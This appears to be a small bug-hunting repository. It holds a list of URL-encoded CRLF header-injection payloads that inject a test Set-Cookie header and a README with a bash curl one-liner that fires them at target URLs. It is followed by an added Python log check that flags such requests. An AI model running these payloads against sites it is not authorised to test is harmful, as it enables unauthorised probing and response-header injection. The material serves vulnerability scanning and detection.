├── subdomains.txt
├── crlf_payloads.txt
└── README.md

/subdomains.txt:
--------------------------------------------------------------------------------
https://website1.com
https://website2.com
http://website3.com

--------------------------------------------------------------------------------
/crlf_payloads.txt:
--------------------------------------------------------------------------------
/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%Od%OaSet-Cookie:crlf=injection
/%OdSet-Cookie:crlf=injection
/%23%OaSet-Cookie:crlf=injection
/%23%Od%OaSet-Cookie:crlf=injection
/%23%OdSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%Od%OaSet-Cookie:crlf=injection
/%2f%2e%2e%Od%OaSet-Cookie:crlf=injection
/%2F..%Od%OaSet-Cookie:crlf=injection
/%3f%Od%OaSet-Cookie:crlf=injection
/%3f%OdSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CRLF-one-liner
A simple Bash one-liner that aims to automate CRLF vulnerability scanning. This is an extremely helpful and practical one-liner for bug hunters, which helps you find CRLF misconfiguration in every possible method. Simply replace the links in subdomains.txt with the URL you want to target. This will help you scan for CRLF vulnerability without the need of an external tool. All you have to do is copy and paste the commands into your terminal and keep your fingers crossed for any possible CRLF.

## One-Liner Payload

`input='CRLF-one-liner/subdomains.txt';while IFS= read -r targets; do cat CRLF-one-liner/crlf_payloads.txt|xargs -I % sh -c "curl -vs --max-time 9 $targets/% 2>&1 |grep -q '< Set-Cookie: ?crlf'&& echo $targets '[+] is vulnerable with payload: '%>>crlf_results.txt||echo '[-] Not vulnerable: '$targets";done<$input`

## Installation

**Linux and Mac:**

Download the GitHub repository (from the /home directory):
`git clone https://github.com/kleiton0x00/CRLF-one-liner.git`

**Windows:**
https://github.com/kleiton0x00/CRLF-one-liner/archive/master.zip
`Save it in Desktop`
`Extract the zip`

## Usage
1. Open subdomains.txt and add the URL you want to scan.
2. Copy and paste the One-Liner Payload into your terminal.

## Demo

![Demo CRLF one liner](https://i.imgur.com/A43KlGE.gif)

## NOTE
Make sure to execute the payload directly as you open the terminal. Don't change directory for any reason! However, if your local directory doesn't match the payload's directory, feel free to change the paths manually.
For example:
From `input='Desktop/CRLF-one-liner/subdomains.txt'` to `input='another/path/to/subdomains.txt'`
From `cat CRLF-one-liner/crlf_payloads.txt` to `cat path/to/crlf_payloads.txt`

--------------------------------------------------------------------------------
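For the defending side, an added example that is not part of this repository: the entries in crlf_payloads.txt hide the line feed behind single, double, mixed and `%u` encodings, so a log check has to peel decoding layers before looking for CR/LF in the request target. The access-log format, the sample lines and all function names below are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote

U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")         # non-standard %uXXXX form
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request line of a combined-format log
MAX_ROUNDS = 5  # assumed bound on stacked encoding layers


def decode_layers(target, max_rounds=MAX_ROUNDS):
    """Percent-decode repeatedly until the string stops changing."""
    for _ in range(max_rounds):
        step = U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), target)
        step = unquote(step, encoding="latin-1")
        if step == target:
            break
        target = step
    return target


def has_crlf(target):
    """True if some decoding layer of the request target exposes CR or LF."""
    decoded = decode_layers(target)
    return "\r" in decoded or "\n" in decoded


def flag_requests(log_lines):
    """Return the request targets from access-log lines that decode to CR/LF."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m and has_crlf(m.group(1)):
            hits.append(m.group(1))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /%250aSet-Cookie:crlf=injection HTTP/1.1" 404 153',
    '198.51.100.4 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=a%20b HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /%u000aSet-Cookie:crlf=injection HTTP/1.1" 404 153',
]

if __name__ == "__main__":
    for target in flag_requests(SAMPLE_LOG):
        print("CR/LF after decoding:", target)
```

The same `has_crlf` test can sit in front of any code that copies request data into a response header, rejecting the request instead of logging it.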